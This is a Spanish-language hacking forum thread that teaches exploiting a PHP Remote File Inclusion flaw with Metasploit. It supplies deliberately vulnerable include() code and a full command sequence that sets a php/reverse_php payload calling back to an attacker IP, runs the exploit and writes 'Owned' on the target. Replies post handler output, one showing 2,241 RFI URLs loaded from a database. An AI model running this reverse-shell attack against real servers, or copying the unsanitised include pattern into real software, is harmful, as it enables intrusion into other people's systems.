Una muestra más de que Metasploit sirve para explotar cualquier tipo de vulnerabilidad está aquí, un módulo de Metasploit para explotar RFIs.

RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().

[Enlace externo eliminado para invitados]


Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php:

Código: Seleccionar todo

cd /var/www/html
mkdir 1
vi 1/index.php
Se agrega al archivo index.php el pedazo de código vulnerable:

Código: Seleccionar todo

<?php
 $color='blue';
 if (isset($_GET['COLOR']))
  $color = $_GET['COLOR'];
 require($color.'.php');
?>
O también puede ser este:

Código: Seleccionar todo

<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>
De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:

Código: Seleccionar todo

chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]
[+] El vídeo lo saqué de [Enlace externo eliminado para invitados]
Así sinceramente, no me gusta mucho Metasploit.
No sé por qué, estoy loco..
Soy masoquista yo creo y me gustan las cosas duras y difíciles
Noticia: 51mpl3x dice que si fuera chica, se casaría conmigo. (1/Agosto/2011 at 5:52 pm)
Esperandote verte diciendo que eres gay no seas malito y pasate unas fotos ¿si?
Muchas gracias por el tutorial :)
pero no consigo hacerlo funcionar.

Código: Seleccionar todo

[-] Handler failed to bind to xxx.xxx.xxx.xxx:4444
[*] Started reverse handler on 0.0.0.0:4444 
[-] Exploit exception: The address is already in use (0.0.0.0:8080).
[*] Exploit completed, but no session was created.
Tienes idea de que puede ser? he seguido el tuto al pie de la letra, es posible que sea un problema de puertos? que no lo tenga habierto?
Gracias por el tuto! pero no consigo crear la sesión.
se os ocurre porque puede ser?

Código: Seleccionar todo

[-] Handler failed to bind to xx.xxx.xxx.xx:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Using URL: http://0.0.0.0:8080/ZVxsvPoMpBByDc
[*]  Local IP: http://192.168.0.5:8080/ZVxsvPoMpBByDc
[*] PHP include server started.
[*] Loading RFI URLs from the database...
[*] Loaded 2241 URLs
[*] Exploit completed, but no session was created.
Puede ser que necesite abrir el puerto 4444 en el router?
Responder

Volver a “Exploits”